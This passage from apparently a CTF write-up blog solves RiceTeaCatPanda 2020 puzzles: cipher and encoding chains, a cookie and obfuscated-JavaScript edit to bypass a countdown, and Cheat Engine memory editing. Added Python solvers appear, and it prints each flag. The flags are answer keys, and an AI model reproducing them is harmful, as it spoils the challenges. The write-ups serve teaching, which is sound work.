</code></pre></div>
<p>The hint gives us the correspondence for the <code>Hump's Day</code>: Wednesday.</p>
<p>We can use either the day of the month (<code>22</code>) or the day of the week (<code>3</code>, counting Sunday as <code>0</code>).</p>
<p>The second hint gives the recipe: <code>Decimate</code> (decimal digits), <code>hexenon</code> (hexadecimal) and <code>string</code>.</p>
<p>So every line must become a single digit between 0 and 9, which rules out the day of the month: we take the day-of-week number, apply the <code>+n</code>/<code>-n</code> offsets, and repeat the digit for <code>3 times</code>.</p>
<p>Concatenating all the digits gives <code>3563531888962843501</code>.</p>
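<p>Putting the three hints together as code: parse each <code>Happy ...</code> line, map the day to its Sunday-based number, apply the offset and the repeat count, then read the digit string as a decimal number whose hexadecimal form is the flag text. This is an added example, not the post's one-liner; the day names and nicknames are taken from the challenge, and the reading of <code>TGIF</code> as Friday is my assumption (it is consistent with the result).</p>

```python
import re

# The challenge lines, copied from the page.
CHALLENGE = """Happy Hump's Day
Happy TGIF!
Happy Saturday
Happy Tuesday +1
Happy Thursday +1
Happy TGIF -2
Happy Monday!
Happy Hump's day +5 3 times
Happy Saturday +3
Happy TGIF +1
Happy Tuesday +0
Happy Friday +3
Happy TGIF -1
Happy Wednesday
Happy TGIF
Happy Sunday
Happy Saturday -5"""

# Day-of-week numbers with Sunday = 0, plus the two nicknames the challenge uses.
DAY_NUMBER = {
    "sunday": 0, "monday": 1, "tuesday": 2, "wednesday": 3,
    "thursday": 4, "friday": 5, "saturday": 6,
    "hump's day": 3,   # hint 1: Hump's Day is Wednesday
    "tgif": 5,         # assumption: "Thank God It's Friday"
}

# "Happy <day>[!] [+n|-n] [k times]" with the day name matched lazily.
LINE_RE = re.compile(
    r"^Happy\s+(?P<day>[A-Za-z' ]+?)!?\s*(?P<offset>[+-]\d+)?(?:\s+(?P<times>\d+)\s+times)?\s*$"
)


def digit_for_line(line: str) -> str:
    """One challenge line -> its digit, repeated if the line says 'k times'."""
    m = LINE_RE.match(line.strip())
    if not m:
        raise ValueError(f"unparseable line: {line!r}")
    day = m.group("day").strip().lower()
    if day not in DAY_NUMBER:
        raise ValueError(f"unknown day: {day!r}")
    value = DAY_NUMBER[day] + int(m.group("offset") or 0)
    if not 0 <= value <= 9:   # "Decimate": every line must become one decimal digit
        raise ValueError(f"{line!r} gives {value}, not a single digit")
    return str(value) * int(m.group("times") or 1)


def digits_from_challenge(text: str) -> str:
    return "".join(digit_for_line(l) for l in text.splitlines() if l.strip())


def decode_digits(digits: str) -> str:
    """'hexenon' + 'string': write the number in hex, read the hex as ASCII bytes."""
    hexstr = f"{int(digits):x}"
    if len(hexstr) % 2:
        hexstr = "0" + hexstr
    return "rtcp{" + bytes.fromhex(hexstr).decode("ascii") + "}"


if __name__ == "__main__":
    d = digits_from_challenge(CHALLENGE)
    print(d)                 # 3563531888962843501
    print(decode_digits(d))  # rtcp{1t5_ch3m}
```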
<p>We convert it to a hex string and decode the bytes (the <code>sed</code> wraps the result in the flag format):</p>
<div class="highlight"><pre><span></span><code>$ <span class="nb">printf</span> <span class="s1">'%x'</span> <span class="m">3563531888962843501</span> <span class="p">|</span> xxd -r -p <span class="p">|</span> sed -E <span class="s1">'s/^(.*)/rtcp{\1}/'</span>
rtcp<span class="o">{</span>1t5_ch3m<span class="o">}</span>
</code></pre></div>
<h1>RTCP - I Love You 3000</h1>
<p><em>Published 2020-01-25 by nlegall - <a href="/rtcp-i-love-you-3000.html">/rtcp-i-love-you-3000.html</a></em></p>
<p><em>solves : 22</em></p>
<div class="highlight"><pre><span></span><code>Point : 700
I Love You 3000
❤️ 144, 588, 1869, 1425, 1267, 1708, 1588, 1600, 1889, 1497, 482, 696, 731, 337, 491, 1314, 437, 1514, 1384, 1561, 419, 382, 835, 325, 1835, 1562, 1092 💔
Hint : I don't read books... do/should you?
Hint 2 : submit in the form rtcp{OHMYGAWDTHISISAWHOLEWORD}
</code></pre></div>
<p>No idea what <code>I love you 3000</code> could be. Searching for it turns up:</p>
<ul>
<li>a song : <a href="https://www.youtube.com/watch?v=cPkE0IbDVs4">https://www.youtube.com/watch?v=cPkE0IbDVs4</a></li>
<li>some article about the last Avengers movie : <a href="https://www.insider.com/avengers-endgame-robert-downey-jr-i-love-you-3000-2019-5">https://www.insider.com/avengers-endgame-robert-downey-jr-i-love-you-3000-2019-5</a></li>
<li>the ILOVEYOU worm: <a href="https://en.wikipedia.org/wiki/ILOVEYOU">https://en.wikipedia.org/wiki/ILOVEYOU</a></li>
</ul>
<p>The last one is the most relevant for us. Searching GitHub for its name turns up the source code: <a href="https://github.com/onx/ILOVEYOU">https://github.com/onx/ILOVEYOU</a>.</p>
<p>It contains the love letter that matches our challenge: <a href="https://github.com/onx/ILOVEYOU/blob/master/LOVE-LETTER-FOR-YOU.TXT.vbs">https://github.com/onx/ILOVEYOU/blob/master/LOVE-LETTER-FOR-YOU.TXT.vbs</a>.</p>
<p>Now we need to work out what the numbers are and how to combine them with the text.</p>
<p>Browsing dcode.fr, we find the <a href="https://www.dcode.fr/book-cipher">book cipher</a>, which uses numbers as references to the words or letters of a text.</p>
<p>We enter the whole source as the book and the numbers as indexes, and get the flag: <code>RTCP{I10V3H0WBROKENMY3MAILZR}</code>.</p>
<h1>RTCP - No Sleep</h1>
<p><em>Published 2020-01-25 by nlegall - <a href="/rtcp-no-sleep.html">/rtcp-no-sleep.html</a></em></p>
<p><em>solves : 138</em></p>
<div class="highlight"><pre><span></span><code>Point : 765
Jess doesn't get enough sleep, since he's such a gamer so in this challenge, you'll be staying up with him until 4:00 in the morning :D on a Monday! Let's go, gamers!
</code></pre></div>
<p>The web page shows a JS countdown until the flag is revealed, but we cannot wait that long!</p>
<p><img alt="nosleep.png" src="https://blog.nlegall.fr/images/rtcp/nosleep.png"></p>
<p>There are two ways to get it early, both without leaving the browser.</p>
<h2>JS</h2>
<p>Reading the JS inside the page, we can see that the date comes from the first two values of the string array.</p>
<div class="highlight"><pre><span></span><code><span class="kd">var</span> <span class="nx">_0x1d8e</span><span class="o">=</span><span class="p">[</span><span class="s1">'gamerfuel=Jan\x2027,\x208020\x2004:20:00'</span><span class="p">,</span><span class="s1">'Jan\x2027,\x208020\x2004:20:00'</span><span class="p">,</span><span class="s1">'getTime'</span><span class="p">,</span><span class="s1">'exec'</span><span class="p">,</span><span class="s1">'floor'</span><span class="p">,</span><span class="s1">'getElementById'</span><span class="p">,</span><span class="s1">'gamer\x20timer'</span><span class="p">,</span><span class="s1">'AES'</span><span class="p">,</span><span class="s1">'decrypt'</span><span class="p">,</span><span class="s1">'U2FsdGVkX18kRm6FDkRVQfVuNPTxyOnJzpu8QnI/9UKoCXp6hQcley11nBnLIItj'</span><span class="p">,</span><span class="s1">'ok\x20boomer'</span><span class="p">,</span><span class="s1">'innerHTML'</span><span class="p">,</span><span class="s1">'Utf8'</span><span class="p">,</span><span class="s1">'cookie'</span><span class="p">];(</span><span class="kd">function</span><span class="p">(</span><span class="nx">_0x29eed8</span><span class="p">,</span><span class="nx">_0x4bb4aa</span><span class="p">){</span><span class="kd">var</span> <span class="nx">_0x47e29c</span><span class="o">=</span><span class="kd">function</span><span class="p">(</span><span class="nx">_0x2d3fd2</span><span class="p">){</span><span class="k">while</span><span class="p">(</span><span class="o">--</span><span class="nx">_0x2d3fd2</span><span class="p">){</span><span class="nx">_0x29eed8</span><span class="p">[</span><span class="s1">'push'</span><span class="p">](</span><span class="nx">_0x29eed8</span><span class="p">[</span><span class="s1">'shift'</span><span class="p">]());}};</span><span class="nx">_0x47e29c</span><span class="p">(</span><span class="o">++</span><span class="nx">_0x4bb4aa</span><span class="p">);}(</span><span class="nx">_0x1d8e</span><span 
class="p">,</span><span class="mh">0x99</span><span class="p">));</span><span class="kd">var</span> <span class="nx">_0x2ad1</span><span class="o">=</span><span class="kd">function</span><span class="p">(</span><span class="nx">_0x545e19</span><span class="p">,</span><span class="nx">_0x47cdd3</span><span class="p">){</span><span class="nx">_0x545e19</span><span class="o">=</span><span class="nx">_0x545e19</span><span class="o">-</span><span class="mh">0x0</span><span class="p">;</span><span class="kd">var</span> <span class="nx">_0x4275c2</span><span class="o">=</span><span class="nx">_0x1d8e</span><span class="p">[</span><span class="nx">_0x545e19</span><span class="p">];</span><span class="k">return</span> <span class="nx">_0x4275c2</span><span class="p">;};</span><span class="nb">document</span><span class="p">[</span><span class="nx">_0x2ad1</span><span class="p">(</span><span class="s1">'0x0'</span><span class="p">)]</span><span class="o">=</span><span class="nx">_0x2ad1</span><span class="p">(</span><span class="s1">'0x1'</span><span class="p">);</span><span class="kd">var</span> <span class="nx">countDownDate</span><span class="o">=</span><span class="k">new</span> <span class="nb">Date</span><span class="p">(</span><span class="nx">_0x2ad1</span><span class="p">(</span><span class="s1">'0x2'</span><span class="p">))[</span><span class="nx">_0x2ad1</span><span class="p">(</span><span class="s1">'0x3'</span><span class="p">)]();</span><span class="kd">var</span> <span class="nx">x</span><span class="o">=</span><span class="nx">setInterval</span><span class="p">(</span><span class="kd">function</span><span class="p">(){</span><span class="kd">var</span> <span class="nx">_0x27a8c6</span><span class="o">=</span><span class="k">new</span> <span class="nb">Date</span><span class="p">(</span><span class="sr">/[^=]*$/</span><span class="p">[</span><span class="nx">_0x2ad1</span><span class="p">(</span><span class="s1">'0x4'</span><span class="p">)](</span><span 
class="nb">document</span><span class="p">[</span><span class="nx">_0x2ad1</span><span class="p">(</span><span class="s1">'0x0'</span><span class="p">)])[</span><span class="mh">0x0</span><span class="p">])[</span><span class="nx">_0x2ad1</span><span class="p">(</span><span class="s1">'0x3'</span><span class="p">)]();</span><span class="kd">var</span> <span class="nx">_0x5b92f1</span><span class="o">=</span><span class="k">new</span> <span class="nb">Date</span><span class="p">()[</span><span class="s1">'getTime'</span><span class="p">]();</span><span class="kd">var</span> <span class="nx">_0x3a5a33</span><span class="o">=</span><span class="nx">_0x27a8c6</span><span class="o">-</span><span class="nx">_0x5b92f1</span><span class="p">;</span><span class="kd">var</span> <span class="nx">_0x4214a2</span><span class="o">=</span><span class="nb">Math</span><span class="p">[</span><span class="nx">_0x2ad1</span><span class="p">(</span><span class="s1">'0x5'</span><span class="p">)](</span><span class="nx">_0x3a5a33</span><span class="o">/</span><span class="p">(</span><span class="mh">0x3e8</span><span class="o">*</span><span class="mh">0x3c</span><span class="o">*</span><span class="mh">0x3c</span><span class="o">*</span><span class="mh">0x18</span><span class="p">));</span><span class="kd">var</span> <span class="nx">_0x48c0d9</span><span class="o">=</span><span class="nb">Math</span><span class="p">[</span><span class="nx">_0x2ad1</span><span class="p">(</span><span class="s1">'0x5'</span><span class="p">)](</span><span class="nx">_0x3a5a33</span><span class="o">%</span><span class="p">(</span><span class="mh">0x3e8</span><span class="o">*</span><span class="mh">0x3c</span><span class="o">*</span><span class="mh">0x3c</span><span class="o">*</span><span class="mh">0x18</span><span class="p">)</span><span class="o">/</span><span class="p">(</span><span class="mh">0x3e8</span><span class="o">*</span><span class="mh">0x3c</span><span class="o">*</span><span 
class="mh">0x3c</span><span class="p">));</span><span class="kd">var</span> <span class="nx">_0x2de271</span><span class="o">=</span><span class="nb">Math</span><span class="p">[</span><span class="nx">_0x2ad1</span><span class="p">(</span><span class="s1">'0x5'</span><span class="p">)](</span><span class="nx">_0x3a5a33</span><span class="o">%</span><span class="p">(</span><span class="mh">0x3e8</span><span class="o">*</span><span class="mh">0x3c</span><span class="o">*</span><span class="mh">0x3c</span><span class="p">)</span><span class="o">/</span><span class="p">(</span><span class="mh">0x3e8</span><span class="o">*</span><span class="mh">0x3c</span><span class="p">));</span><span class="kd">var</span> <span class="nx">_0x240ffb</span><span class="o">=</span><span class="nb">Math</span><span class="p">[</span><span class="s1">'floor'</span><span class="p">](</span><span class="nx">_0x3a5a33</span><span class="o">%</span><span class="p">(</span><span class="mh">0x3e8</span><span class="o">*</span><span class="mh">0x3c</span><span class="p">)</span><span class="o">/</span><span class="mh">0x3e8</span><span class="p">);</span><span class="nb">document</span><span class="p">[</span><span class="nx">_0x2ad1</span><span class="p">(</span><span class="s1">'0x6'</span><span class="p">)](</span><span class="nx">_0x2ad1</span><span class="p">(</span><span class="s1">'0x7'</span><span class="p">))[</span><span class="s1">'innerHTML'</span><span class="p">]</span><span class="o">=</span><span class="nx">_0x4214a2</span><span class="o">+</span><span class="s1">'d\x20'</span><span class="o">+</span><span class="nx">_0x48c0d9</span><span class="o">+</span><span class="s1">'h\x20'</span><span class="o">+</span><span class="nx">_0x2de271</span><span class="o">+</span><span class="s1">'m\x20'</span><span class="o">+</span><span class="nx">_0x240ffb</span><span class="o">+</span><span class="s1">'s\x20'</span><span class="p">;</span><span class="k">if</span><span 
class="p">(</span><span class="nx">_0x3a5a33</span><span class="o"><</span><span class="mh">0x0</span><span class="p">){</span><span class="nx">clearInterval</span><span class="p">(</span><span class="nx">x</span><span class="p">);</span><span class="kd">var</span> <span class="nx">_0x1018af</span><span class="o">=</span><span class="nx">CryptoJS</span><span class="p">[</span><span class="nx">_0x2ad1</span><span class="p">(</span><span class="s1">'0x8'</span><span class="p">)][</span><span class="nx">_0x2ad1</span><span class="p">(</span><span class="s1">'0x9'</span><span class="p">)](</span><span class="nx">_0x2ad1</span><span class="p">(</span><span class="s1">'0xa'</span><span class="p">),</span><span class="nx">_0x2ad1</span><span class="p">(</span><span class="s1">'0xb'</span><span class="p">));</span><span class="nb">document</span><span class="p">[</span><span class="nx">_0x2ad1</span><span class="p">(</span><span class="s1">'0x6'</span><span class="p">)](</span><span class="nx">_0x2ad1</span><span class="p">(</span><span class="s1">'0x7'</span><span class="p">))[</span><span class="nx">_0x2ad1</span><span class="p">(</span><span class="s1">'0xc'</span><span class="p">)]</span><span class="o">=</span><span class="nx">_0x1018af</span><span class="p">[</span><span class="s1">'toString'</span><span class="p">](</span><span class="nx">CryptoJS</span><span class="p">[</span><span class="s1">'enc'</span><span class="p">][</span><span class="nx">_0x2ad1</span><span class="p">(</span><span class="s1">'0xd'</span><span class="p">)]);}},</span><span class="mh">0x3e8</span><span class="p">);</span>
</code></pre></div>
<p>We can edit them to a past date and paste the whole modified script into the web console.</p>
<div class="highlight"><pre><span></span><code><span class="nx">gamerfuel</span><span class="o">=</span><span class="s1">'Jan\x2027,\x202017\x2004:20:00'</span><span class="p">,</span><span class="s1">'Jan\x2027,\x202017\x2004:20:00'</span>
</code></pre></div>
<h2>Cookie</h2>
<p>The date set by the JS code is stored in a cookie. As we did for the JS exploit, we can edit the cookie to a past date.</p>
<p><code>Jan 27, 2017 04:20:00</code></p>
<p>The result is the same. The flag appears:</p>
<div class="highlight"><pre><span></span><code>Jess will let you be a real gamer in:
rtcp{w0w_d1d_u_st4y_up?}
</code></pre></div>
<h1>RTCP - notice me senpai</h1>
<p><em>2020-01-25 - nlegall - <a href="/rtcp-notice-me-senpai.html">/rtcp-notice-me-senpai.html</a></em></p>
<p><em>solves : 552</em></p>
<div class="highlight"><pre><span></span><code>Point : 100
uwu...senpai placed this note on my desk before class but i cant wead what it says!!!!!! can you hewp me????????? uwu tysm
tlyrc_o_0pnvhu}{137rmi__i_omwm
Challenge Author: Jess (the other one)/J
</code></pre></div>
<p>Ok, no clue how to start this challenge. We notice some strange punctuation (6 exclamation marks and 9 question marks). We can guess that we are looking for a cipher that takes two parameters.</p>
<p>From a previous CTF, I discovered the <a href="https://en.wikipedia.org/wiki/Rail_fence_cipher">Rail fence cipher</a>. It's a basic text-to-text cipher. The website <a href="https://www.geocachingtoolbox.com/index.php?lang=en&page=railFenceCipher">Geocaching Toolbox</a> lets you decode with parameters. Some other well-known websites (dCode or Cryptii) don't take any parameters to decode it.</p>
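<p>An added example (not code from the original write-up) that decodes the rail fence cipher with both parameters, the number of rails and the offset, and also brute-forces them against the flag prefix; it assumes the challenge used 6 rails and offset 9, the two counts from the description.</p>

```python
"""Rail fence cipher with rails and offset, as decoded on Geocaching Toolbox.

Added example, not code from the original write-up. The challenge values
(6 rails, offset 9) are the two punctuation counts from the description.
"""


def rail_pattern(length, rails, offset=0):
    """Rail index of every text position along the zigzag.

    The zigzag repeats every 2*(rails-1) positions; the offset shifts
    where inside that cycle the first character lands.
    """
    if rails < 2:
        raise ValueError("need at least two rails")
    period = 2 * (rails - 1)
    pattern = []
    for i in range(length):
        t = (i + offset) % period
        pattern.append(t if t < rails else period - t)
    return pattern


def rail_fence_encrypt(plaintext, rails, offset=0):
    """Write the text along the zigzag, then read it off rail by rail."""
    pattern = rail_pattern(len(plaintext), rails, offset)
    return "".join(
        ch for r in range(rails) for ch, p in zip(plaintext, pattern) if p == r
    )


def rail_fence_decrypt(ciphertext, rails, offset=0):
    """Invert the encryption by rebuilding the read-off order."""
    pattern = rail_pattern(len(ciphertext), rails, offset)
    # Positions sorted by (rail, position) is exactly the order in which the
    # encryptor emitted them, so ciphertext[k] belongs at plaintext[order[k]].
    order = sorted(range(len(ciphertext)), key=lambda i: (pattern[i], i))
    plain = [""] * len(ciphertext)
    for k, pos in enumerate(order):
        plain[pos] = ciphertext[k]
    return "".join(plain)


def find_parameters(ciphertext, known_prefix, max_rails=12):
    """Every (rails, offset, plaintext) whose plaintext starts with the flag
    format; useful when the description gives no hint about the parameters."""
    hits = []
    for rails in range(2, max_rails + 1):
        for offset in range(2 * (rails - 1)):
            candidate = rail_fence_decrypt(ciphertext, rails, offset)
            if candidate.startswith(known_prefix):
                hits.append((rails, offset, candidate))
    return hits


CIPHERTEXT = "tlyrc_o_0pnvhu}{137rmi__i_omwm"  # the note from the challenge

if __name__ == "__main__":
    print(rail_fence_decrypt(CIPHERTEXT, 6, 9))
    for rails, offset, text in find_parameters(CIPHERTEXT, "rtcp{"):
        print(rails, offset, text)
```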
<p><img alt="noticemesenpai" src="https://blog.nlegall.fr/images/rtcp/noticemesenpai.png"></p>
<p>Hop ! Done with this chall : <code>rtcp{im_1n_lov3_wi7h_y0ur_mom}</code>.</p>
<h1>RTCP - pandamonium</h1>
<p><em>2020-01-25 - nlegall - <a href="/rtcp-pandamonium.html">/rtcp-pandamonium.html</a></em></p>
<p><em>solves : 58</em></p>
<div class="highlight"><pre><span></span><code>Point : 100
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
91 7 10 D 95 42 28 A
hint: underscore between 6th and 7th char, not including the flag wrapping (rtcp{})
</code></pre></div>
<p>We get some numbers along with a really nice description.</p>
<p>The numbers are atomic numbers of chemical elements in the periodic table; the letters (<code>D</code> and <code>A</code>) are kept as they are.</p>
<p><img alt="" src="https://upload.wikimedia.org/wikipedia/commons/thumb/2/2e/Simple_Periodic_Table_Chart-en.svg/640px-Simple_Periodic_Table_Chart-en.svg.png"></p>
<table>
<thead>
<tr>
<th>Number</th>
<th>Element</th>
</tr>
</thead>
<tbody>
<tr>
<td>91</td>
<td>Pa</td>
</tr>
<tr>
<td>7</td>
<td>N</td>
</tr>
<tr>
<td>10</td>
<td>Ne</td>
</tr>
<tr>
<td>D</td>
<td>-</td>
</tr>
<tr>
<td>95</td>
<td>Am</td>
</tr>
<tr>
<td>42</td>
<td>Mo</td>
</tr>
<tr>
<td>28</td>
<td>Ni</td>
</tr>
<tr>
<td>A</td>
<td>-</td>
</tr>
</tbody>
</table>
<p>So, final flag is : <code>rtcp{PaNNeDAmMoNiA}</code>.</p>
<h1>RTCP - Pandas Like Salads</h1>
<p><em>2020-01-25 - nlegall - <a href="/rtcp-pandas-like-salads.html">/rtcp-pandas-like-salads.html</a></em></p>
<p><em>solves : 154</em></p>
<div class="highlight"><pre><span></span><code>Point : 350
Did you know a new panda was added to the Washington DC zoo recently? Yep, apparently she really like salads. Interesting, yeah? Also, the panda keepers of the zoo said that the key to happiness in life is a little CUTENESS every day. You know, all the keepers who are on the panda's rotation all said the same thing to me. Very interesting.
</code></pre></div>
<p><img alt="pandas_like_salads.png" src="https://raw.githubusercontent.com/JEF1056/riceteacatpanda/master/Pandas%20Like%20Salads%20(350)/pandas_like_salads.png"></p>
<p>Ok, we have a strange alphabet. I remember a book I read a long time ago about it. It's called the <a href="https://en.wikipedia.org/wiki/Pigpen_cipher">Pigpen cipher</a>. Decoding it gives us the first step : <code>ysay{hjkahr_qqgdia_unr_kw_yrq_pm_nnfb}</code>.</p>
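<p>The remaining two steps of this challenge (Vigenère with the key <code>CUTENESS</code> from the description, then a Caesar shift), as an added example that is not part of the original post; the Caesar shift is recovered from the known flag prefix <code>rtcp{</code> instead of being hard-coded.</p>

```python
"""Vigenère then Caesar, the last two steps of this challenge.

Added example, not code from the original write-up. Non-letters (braces,
underscores) pass through unchanged and do not consume a key letter, which
is the convention the write-up's intermediate string relies on.
"""
import string

LOWER = string.ascii_lowercase


def shift_char(ch, amount):
    """Shift one letter by `amount` (mod 26), keeping case; leave the rest."""
    if ch in LOWER:
        return LOWER[(LOWER.index(ch) + amount) % 26]
    if ch.lower() in LOWER:
        return LOWER[(LOWER.index(ch.lower()) + amount) % 26].upper()
    return ch


def vigenere_decrypt(ciphertext, key):
    """Subtract the repeating key; the key index only advances on letters."""
    shifts = [LOWER.index(k) for k in key.lower() if k in LOWER]
    if not shifts:
        raise ValueError("key must contain at least one letter")
    out, i = [], 0
    for ch in ciphertext:
        if ch.lower() in LOWER:
            out.append(shift_char(ch, -shifts[i % len(shifts)]))
            i += 1
        else:
            out.append(ch)
    return "".join(out)


def caesar(text, amount):
    """Shift every letter by `amount`; a key of 21 equals decrypting by 5."""
    return "".join(shift_char(ch, amount) for ch in text)


def caesar_shift_from_prefix(text, known_prefix):
    """Find the shift that maps the start of `text` onto a known prefix."""
    for shift in range(26):
        if caesar(text, shift).startswith(known_prefix):
            return shift
    return None


PIGPEN_OUTPUT = "ysay{hjkahr_qqgdia_unr_kw_yrq_pm_nnfb}"  # step 1 from the write-up
KEY = "CUTENESS"  # the capitalised word in the challenge description


def solve(text=PIGPEN_OUTPUT, key=KEY, flag_prefix="rtcp{"):
    """Return (after_vigenere, caesar_shift, flag); the last two are None
    when no Caesar shift lines the text up with the flag prefix."""
    after_vigenere = vigenere_decrypt(text, key)
    shift = caesar_shift_from_prefix(after_vigenere, flag_prefix)
    if shift is None:
        return after_vigenere, None, None
    return after_vigenere, shift, caesar(after_vigenere, shift)


if __name__ == "__main__":
    print(solve())
```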
<p>We need to decode it again. The description gives us a key (<code>CUTENESS</code>). With this key, we can try to decode it with the <a href="https://en.wikipedia.org/wiki/Vigen%C3%A8re_cipher">Vigenère cipher</a>.
We then get <code>wyhu{ufsifx_xmtzqi_sty_gj_uzy_ns_ujsx}</code>. Ok, one more step is still required. We can notice that the start (<code>wyhu</code>) is 5 letters ahead of the expected <code>rtcp</code>. We can undo it with a Caesar cipher using 21 (26-5) as the key : <code>rtcp{pandas_should_not_be_put_in_pens}</code>.</p>
<h1>RTCP - Strong Password</h1>
<p><em>2020-01-25 - nlegall - <a href="/rtcp-strong-password.html">/rtcp-strong-password.html</a></em></p>
<p><em>solves : 484</em></p>
<div class="highlight"><pre><span></span><code><span class="n">Point</span> <span class="o">:</span> <span class="mi">1</span>
<span class="n">Eat</span><span class="o">,</span> <span class="n">Drink</span><span class="o">,</span> <span class="n">Pet</span><span class="o">,</span> <span class="n">Hug</span><span class="o">,</span> <span class="n">Repeat</span><span class="o">!</span>
<span class="n">flags</span> <span class="n">are</span> <span class="n">entered</span> <span class="k">in</span> <span class="n">the</span> <span class="n">format</span> <span class="n">rtcp</span><span class="o">{</span><span class="n">flag</span><span class="o">}</span>
</code></pre></div>
<p>The first flag I got during this CTF. The solution is the name of the CTF itself : you eat rice, you drink tea, you pet the cat and hug the panda.</p>
<p>So, the final flag is : <code>rtcp{rice_tea_cat_panda}</code></p>
<h1>RTCP - Tea clicker</h1>
<p><em>2020-01-25 - nlegall - <a href="/rtcp-tea-clicker.html">/rtcp-tea-clicker.html</a></em></p>
<p><em>solves : 138</em></p>
<div class="highlight"><pre><span></span><code>Point : 150
It's not too far back in my memory when cookie clickers were all the rage. But this new one with tea and cats has such great art and themes, I'm hooked! Unfortunately, the only reward is so many clicks away, and even if I spend double the time, I still can't get it!
</code></pre></div>
<p>This challenge reminds me of some old games with <a href="https://cheatengine.org/">CheatEngine</a>. This program lets you edit values in memory through a GUI with some nice search functions. If you don't have Windows, you can install it through Wine or use <a href="https://github.com/scanmem/scanmem">GameConqueror</a> (a GUI for scanmem).</p>
<p>Both use the same workflow. You select the right value type (or all types), search a first time for the current value (for example <code>0</code>, the starting score), change the value in the game and repeat the search. If you still get a lot of addresses back, change it again and search again.</p>
<p>I searched three times and got only one value. Double-click on it and then edit it from the tab below.</p>
<p><img alt="teaclicker.png" src="https://blog.nlegall.fr/images/rtcp/teaclicker.png"></p>
<p>As soon as you submit your edit, the flag replaces the target score:</p>
<p><img alt="teaclicker2.png" src="https://blog.nlegall.fr/images/rtcp/teaclicker2.png"></p>
<h1>RTCP - That's a Lot of Stuff...</h1>
<p><em>2020-01-25 - nlegall - <a href="/rtcp-thats-a-lot-of-stuff.html">/rtcp-thats-a-lot-of-stuff.html</a></em></p>
<p><em>solves : 154</em></p>
<div class="highlight"><pre><span></span><code>Point : 275
Do you want some numbers? Here, take these numbers. I don't need them anyways. I have too many numbers at home, so go on, take them. Shoves numbers towards the computer screen
31 34 33 20 31 35 36 20 31 32 32 20 31 35 32 20 31 34 33 20 31 31 30 20 31 36 34 20 31 35 32 20 31 31 35 20 31 30 37 20 36 35 20 36 32 20 31 31 35 20 36 33 20 31 31 32 20 31 37 32 20 31 31 35 20 31 32 34 20 31 30 32 20 31 36 35 20 31 34 33 20 36 31 20 37 31 20 31 35 30 20 31 34 33 20 31 35 32 20 31 31 36 20 31 34 36 20 31 31 36 20 31 30 36 20 37 31 20 31 35 32 20 31 31 35 20 31 30 34 20 31 30 32 20 31 31 35 20 31 33 30 20 36 32 20 31 31 35 20 36 30 20 31 34 34 20 31 31 30 20 31 31 36 20 37 31
</code></pre></div>
<p>We have a chain of hex values. First, decode it with <code>xxd</code> :</p>
<div class="highlight"><pre><span></span><code>$ <span class="nb">echo</span> <span class="s2">"31 34 33 20 31 35 36 20 31 32 32 20 31 35 32 20 31 34 33 20 31 31 30 20 31 36 34 20 31 35 32 20 31 31 35 20 31 30 37 20 36 35 20 36 32 20 31 31 35 20 36 33 20 31 31 32 20 31 37 32 20 31 31 35 20 31 32 34 20 31 30 32 20 31 36 35 20 31 34 33 20 36 31 20 37 31 20 31 35 30 20 31 34 33 20 31 35 32 20 31 31 36 20 31 34 36 20 31 31 36 20 31 30 36 20 37 31 20 31 35 32 20 31 31 35 20 31 30 34 20 31 30 32 20 31 31 35 20 31 33 30 20 36 32 20 31 31 35 20 36 30 20 31 34 34 20 31 31 30 20 31 31 36 20 37 31"</span> <span class="p">|</span> xxd -r -p
<span class="m">143</span> <span class="m">156</span> <span class="m">122</span> <span class="m">152</span> <span class="m">143</span> <span class="m">110</span> <span class="m">164</span> <span class="m">152</span> <span class="m">115</span> <span class="m">107</span> <span class="m">65</span> <span class="m">62</span> <span class="m">115</span> <span class="m">63</span> <span class="m">112</span> <span class="m">172</span> <span class="m">115</span> <span class="m">124</span> <span class="m">102</span> <span class="m">165</span> <span class="m">143</span> <span class="m">61</span> <span class="m">71</span> <span class="m">150</span> <span class="m">143</span> <span class="m">152</span> <span class="m">116</span> <span class="m">146</span> <span class="m">116</span> <span class="m">106</span> <span class="m">71</span> <span class="m">152</span> <span class="m">115</span> <span class="m">104</span> <span class="m">102</span> <span class="m">115</span> <span class="m">130</span> <span class="m">62</span> <span class="m">115</span> <span class="m">60</span> <span class="m">144</span> <span class="m">110</span> <span class="m">116</span> <span class="m">71</span>
</code></pre></div>
<p>Ok. We get a new encoded string. No digit is above 7 (only 0-7 are used), which points to octal encoding. We can decode it with <code>printf</code> after reshaping the string into octal escape sequences :</p>
<div class="highlight"><pre><span></span><code>$ <span class="nb">printf</span> <span class="k">$(</span><span class="nb">echo</span> <span class="s2">"143 156 122 152 143 110 164 152 115 107 65 62 115 63 112 172 115 124 102 165 143 61 71 150 143 152 116 146 116 106 71 152 115 104 102 115 130 62 115 60 144 110 116 71"</span> <span class="p">|</span> sed -E <span class="s1">'s/^(.*)/\\\1/'</span> <span class="p">|</span> sed <span class="s1">'s/ /\\/g'</span><span class="k">)</span>
cnRjcHtjMG52M3JzMTBuc19hcjNfNF9jMDBMX2M0dHN9
</code></pre></div>
<p>Perfect. Again we get a new encoded string. It lacks the typical <code>==</code> padding of base64, but it is still a base64-encoded string.</p>
<div class="highlight"><pre><span></span><code>$ <span class="nb">echo</span> -n <span class="s2">"cnRjcHtjMG52M3JzMTBuc19hcjNfNF9jMDBMX2M0dHN9"</span> <span class="p">|</span> base64 -d
rtcp<span class="o">{</span>c0nv3rs10ns_ar3_4_c00L_c4ts<span class="o">}</span>
</code></pre></div>
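<p>The same three-step chain as one Python script, added here and not from the original post: it detects each layer (space-separated hex, space-separated octal, base64) and peels until the flag marker appears, going a bit beyond this challenge by also handling decimal byte lists and restoring dropped base64 padding.</p>

```python
"""Peel layered text encodings until the flag shows up.

Added example, not code from the original write-up. It recognises the three
layers of this challenge (space-separated hex, space-separated octal, base64)
plus decimal byte lists, and restores base64 padding that was dropped.
"""
import base64
import binascii
import re

HEX_PAIR = re.compile(r"^[0-9a-fA-F]{2}$")
OCTAL = re.compile(r"^[0-7]{1,3}$")
DECIMAL = re.compile(r"^[0-9]{1,3}$")
B64 = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def printable(text):
    return all(ch.isprintable() or ch in "\r\n\t" for ch in text)


def decode_layer(text):
    """Return (layer_name, decoded_text), or None when no layer applies.

    Limitation: a list made only of two-digit tokens is read as hex first,
    because that is what this challenge's outer layer looks like.
    """
    tokens = text.split()
    if not tokens:
        return None
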